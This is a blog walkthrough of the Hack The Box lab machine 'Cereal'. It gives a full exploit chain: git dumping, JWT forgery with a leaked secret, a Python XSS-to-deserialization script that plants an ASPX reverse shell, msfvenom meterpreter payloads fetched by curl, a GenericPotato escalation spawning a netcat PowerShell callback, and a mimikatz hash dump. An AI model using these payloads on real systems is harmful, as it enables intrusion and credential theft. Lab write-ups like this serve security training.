Hack-The-Box-walkthrough[Cereal]

Posted on Edited on In Views: Word count in article: 2.3k Reading time ≈ 8 mins.

introduce

OS: Windows
Difficulty: Hard
Points: 40
Release: 21 Nov 2020
IP: 10.10.10.217

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
7
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.217
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp  open  http     Microsoft IIS httpd 10.0
443/tcp open  ssl/http Microsoft IIS httpd 10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

vhosts from https certificate (add to /etc/hosts): 

1
cereal.htb source.cereal.htb

extract exposed git directory in source.cereal.htb/.git:

1
git clone https://github.com/internetwache/GitTools.git
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# ip=http://source.cereal.htb/.git/
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# mkdir /tmp/git
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# mkdir /tmp/src
┌──(root💀kali)-[~/GitTools-master/Dumper]
└─# ./gitdumper.sh $ip /tmp/git
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating /tmp/git/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/34/b68232714f841a274050591ff5595dcf7f85da
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/8f/2a1a88f15b9109e1f63e4e4551727bfb38eee5
[+] Downloaded: objects/7b/d9533a2e01ec11dfa928bd491fe516477ed291
[+] Downloaded: objects/3a/23ffe921530036a4e0c355e6c8d1d4029cb728
...
┌──(root💀kali)-[~/GitTools-master/Extractor]
└─# ./extractor.sh /tmp/git /tmp/src
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########
[+] Found commit: 3a23ffe921530036a4e0c355e6c8d1d4029cb728
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/.gitignore
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ApplicationOptions.cs
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/Cereal.csproj
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/CerealContext.cs
[+] Found folder: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/.gitignore
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/README.md
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/package-lock.json
[+] Found file: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/package.json
[+] Found folder: /tmp/src/0-3a23ffe921530036a4e0c355e6c8d1d4029cb728/ClientApp/public
...
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# mv /tmp/src ./src
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# ls
src
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# tree
.
└── src
    ├── 0-3a23ffe921530036a4e0c355e6c8d1d4029cb728
    │   ├── ApplicationOptions.cs
    │   ├── appsettings.Development.json
    │   ├── appsettings.json
    │   ├── CerealContext.cs
    │   ├── Cereal.csproj
    │   ├── ClientApp
    │   │   ├── package.json
    │   │   ├── package-lock.json
    │   │   ├── public
    │   │   │   ├── favicon.ico
    │   │   │   ├── FuturaStd-Bold.woff
...

exposed secret in the file “2-8f2a1a88f15b9109e1f63e4e4551727bfb38eee5/Services/UserService.cs”:

1
secretlhfIH&FY*#oysuflkhskjfhefesf

vulnerability in the file “Controllers\RequestsController.cs”:
deserialization (can’t use ysoserial because of custom protection, but can use deserialization of the DownloadManager object -> upload aspx shell)

vulnerability in the file “ClientApp\src\AdminPage\AdminPage.jsx”:

xss (https://snyk.io/vuln/npm:react-marked-markdown:20180517)
-> with this xss we can do server-side requests and trigger the deserialization

create jwt_token with exposed secret:

1
git clone https://github.com/ticarpi/jwt_tool
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(root💀kali)-[~/jwt_tool-master]
└─# python3 jwt_tool.py -S hs256 -p 'secretlhfIH&FY*#oysuflkhskjfhefesf' $(echo -n '{"alg":"HS256","typ":"JWT"}' | base64).$(echo -n '{"name": "1", "exp":' `date -d "+7 days" +%s`} | base64 -w0).

        \   \        \         \          \                    \ 
   \__   |   |  \     |\__    __| \__    __|                    |
         |   |   \    |      |          |       \         \     |
         |        \   |      |          |    __  \     __  \    |
  \      |      _     |      |          |   |     |   |     |   |
   |     |     / \    |      |          |   |     |   |     |   |
\        |    /   \   |      |          |\        |\        |   |
 \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
 Version 2.1.0                \______|             @ticarpi      

Original JWT: 

=====================
Decoded Token Values:
=====================

Token header values:
[+] alg = "HS256"
[+] typ = "JWT"

Token payload values:
[+] name = "1"
[+] exp = 1611309858    ==> TIMESTAMP = 2021-01-22 05:04:18 (UTC)

----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------

jwttool_8f513bf6c46dcbab36a08eb47d9dd4c0 - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiMSIsImV4cCI6MTYxMTMwOTg1OH0.JmUBfIp6MwKWxKDXAPhFEvqHa60qqlYOBWnrKSedMcE

How to create the serialized object in csharp:

1
2
3
4
5
6
7
8
9
10
11
Cereal.DownloadHelper dh = new Cereal.DownloadHelper
{
	URL = "https://someurl/pic.png",
	FilePath = "pic.png",
};

string json = JsonConvert.SerializeObject(dh, new JsonSerializerSettings
{
	TypeNameHandling = TypeNameHandling.All
});
Console.WriteLine(json);

crafted payload looks like this:

1
{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://<ip>/shell.aspx","FilePath":"c:/inetpub/source/uploads/shell.aspx"}

serve aspx rev-shell (edit shell.aspx host and port, i use port 9001):

1
2
3
wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
mousepad shell.aspx
python -m SimpleHTTPServer 80

script to upload shell.aspx (change my_ip and jwt_token):

  • upload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import requests
from urllib3.exceptions import InsecureRequestWarning
import base64

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


jwt_token = '<token>'
my_ip = '<ip>'

URL = 'https://cereal.htb/requests'


js_payload = """var jwt_token = '"""+jwt_token+ """';
targeturl = 'https://cereal.htb/requests';

req = new XMLHttpRequest;
var payload = JSON.stringify({"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://""" +my_ip+"""/shell.aspx","FilePath":"C:/inetpub/source/uploads/shell.aspx"}'});

req.onreadystatechange = function() {
    if (req.readyState == 4) {
        var id = JSON.parse(this.responseText).id;
        //console.log(id)

        req2 = new XMLHttpRequest;
        req2.open('GET', targeturl + "/" + id, false);
        req2.setRequestHeader("Authorization", "Bearer " + jwt_token);
        req2.send();
    }
}
req.open('POST', targeturl, false);
req.setRequestHeader("Authorization", "Bearer " + jwt_token);
req.setRequestHeader('Content-type', 'application/json');
req.send(payload);"""


js_payload_b64 = base64.b64encode(js_payload.encode('utf-8'))
payload = {'json': '{"title":"[XSS](javascript: eval(atob(%22' + js_payload_b64.decode('utf-8') + '%22%29%29)", "flavor":"x", "color":"#FFF", "description":"x"}'}
headers = {'Authorization': 'Bearer ' + jwt_token}


print("shending payload: " + str(payload))
r = requests.post(URL, headers=headers, json=payload, verify=False)
print(r.text)

wait a bit until file is uploaded (1 minute max),
start nc listener (with aspx shell port):

1
nc -lvp 9001

trigger reverse shell:

1
curl -k https://source.cereal.htb/uploads/shell.aspx

enumerate listening ports:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.217.
Ncat: Connection from 10.10.10.217:49973.
Spawn Shell...
Microsoft Windows [Version 10.0.17763.1577]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
cereal\sonny
c:\windows\system32\inetsrv>netstat -aon | findstr /i "listening"
netstat -aon | findstr /i "listening"
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       1668
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       852
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8172           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       468
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       308
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1076
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       600
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       620
  TCP    10.10.10.217:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:49668        0.0.0.0:0              LISTENING       3404
  TCP    127.0.0.1:49672        0.0.0.0:0              LISTENING       3704
  TCP    [::]:22                [::]:0                 LISTENING       1668
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       852
  TCP    [::]:443               [::]:0                 LISTENING       4                                                                              
  TCP    [::]:445               [::]:0                 LISTENING       4                                                                              
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:8080              [::]:0                 LISTENING       4
  TCP    [::]:8172              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       468
  TCP    [::]:49665             [::]:0                 LISTENING       308
  TCP    [::]:49666             [::]:0                 LISTENING       1076
  TCP    [::]:49667             [::]:0                 LISTENING       600
  TCP    [::]:49670             [::]:0                 LISTENING       620
  TCP    [::1]:49668            [::]:0                 LISTENING       3404

-> 8080 interesting

get the user flag

1
2
3
c:\Users\sonny\Desktop>type user.txt
type user.txt
0ed97bdf062900a2eb5b18deb96bfa98

enumerate privs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
c:\Users\sonny\Desktop>whoami /all
whoami /all

USER INFORMATION
----------------

User Name    SID                                           
============ ==============================================
cereal\sonny S-1-5-21-1433318354-2681105707-1558593885-1000


GROUP INFORMATION
-----------------

Group Name                           Type             SID                                                             Attributes                                        
==================================== ================ =============================================================== ==================================================
Everyone                             Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\source.cereal.htb        Well-known group S-1-5-82-1091461672-2110406625-1707532520-1965434010-2231625233 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

-> SeImpersonatePrivilege enabled

create exe for metasploit:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -b "\x00\x0a" -a x86 --platform windows -f exe -o m.exe

run metasploit:

1
2
3
4
5
6
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.6
set LPORT 9003
run

download m.exe to target and execute it:

1
2
3
4
mkdir C:\temp
cd C:\temp
curl http://10.10.14.6/m.exe -o C:\temp\m.exe
.\m.exe

create tunnel in meterpreter:

1
2
# portfwd single ports
portfwd add -l 8081 -p 8080 -r 127.0.0.1

analyze the local port 8080 (on our host on 8081),
you find, that it uses graphql,
after enumerating graphql, you find a callable function, which allows ssrf (updatePlant).
combine this ssrf with SeImpersonatePrivilege -> juicy potato with http -> https://github.com/micahvandeusen/GenericPotato

execute GenericPotato.exe on target:

1
2
3
4
curl http://10.10.14.6/nc64.exe -o C:\temp\nc64.exe
curl http://10.10.14.6/GenericPotato.exe -o C:\temp\GenericPotato.exe
curl http://10.10.14.6/NtApiDotNet.xml -o C:\temp\NtApiDotNet.xml
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.6 9005 -e powershell" -e HTTP -l 8889

call the function with curl on kali:

1
curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"http://localhost:8889\")}"}' 'http://localhost:8081/api/graphql'

and we got system privileged reverse shell and got the flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(root💀kali)-[~/hackthebox/machine/cereal]
└─# nc -lvp 9005
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9005
Ncat: Listening on 0.0.0.0:9005
Ncat: Connection from 10.10.10.217.
Ncat: Connection from 10.10.10.217:50126.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd \users\administrator\desktop
cd \users\administrator\desktop
PS C:\users\administrator\desktop> dir
dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        1/15/2021  12:17 AM             34 root.txt                                                              


PS C:\users\administrator\desktop> cat root.txt
cat root.txt
2ef4dd4807656f580a6e513cb43957e0

use mimikatz get ntlm hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
PS C:\users\administrator\desktop> .\mimikatz.exe
.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 546250 (00000000:000855ca)
Session           : Batch from 0
User Name         : sonny
Domain            : CEREAL
Logon Server      : CEREAL
Logon Time        : 1/15/2021 12:44:49 AM
SID               : S-1-5-21-1433318354-2681105707-1558593885-1000
        msv :
         [00000003] Primary
         * Username : sonny
         * Domain   : CEREAL
         * NTLM     : 9806947d86b058dfca0dde0433579cab
         * SHA1     : 519524c36daac6f62dbb631fac66ed1cedf3ab01
        tspkg :
        wdigest :
         * Username : sonny
         * Domain   : CEREAL
         * Password : (null)
        kerberos :
         * Username : sonny
         * Domain   : CEREAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CEREAL$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:28 AM
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : CEREAL$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : cereal$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 44904 (00000000:0000af68)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:28 AM
SID               : 
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 196095 (00000000:0002fdff)
Session           : Service from 0
User Name         : cereal.htb
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:44 AM
SID               : S-1-5-82-3871417701-2112554078-3336495516-2512288484-1474308953
        msv :
        tspkg :
        wdigest :
         * Username : CEREAL$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:29 AM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 89034 (00000000:00015bca)
Session           : Batch from 0
User Name         : sonny
Domain            : CEREAL
Logon Server      : CEREAL
Logon Time        : 1/15/2021 12:17:29 AM
SID               : S-1-5-21-1433318354-2681105707-1558593885-1000
        msv :
         [00000003] Primary
         * Username : sonny
         * Domain   : CEREAL
         * NTLM     : 9806947d86b058dfca0dde0433579cab
         * SHA1     : 519524c36daac6f62dbb631fac66ed1cedf3ab01
        tspkg :
        wdigest :
         * Username : sonny
         * Domain   : CEREAL
         * Password : (null)
        kerberos :
         * Username : sonny
         * Domain   : CEREAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:28 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 46077 (00000000:0000b3fd)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:28 AM
SID               : S-1-5-96-0-1
        msv :
        tspkg :
        wdigest :
         * Username : CEREAL$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 46049 (00000000:0000b3e1)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:28 AM
SID               : S-1-5-96-0-0
        msv :
        tspkg :
        wdigest :
         * Username : CEREAL$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CEREAL$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 1/15/2021 12:17:28 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : CEREAL$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : cereal$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Summary of knowledge

  • use gittool to get the source code
  • DownloadManager object deserialization
  • use xss do server-side requests and trigger the deserialization to download webshell
  • port forwarding by using portfwd
  • combine graphql ssrf with SeImpersonatePrivilege -> juicy potato with http by using GenericPotato to privilege escalation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…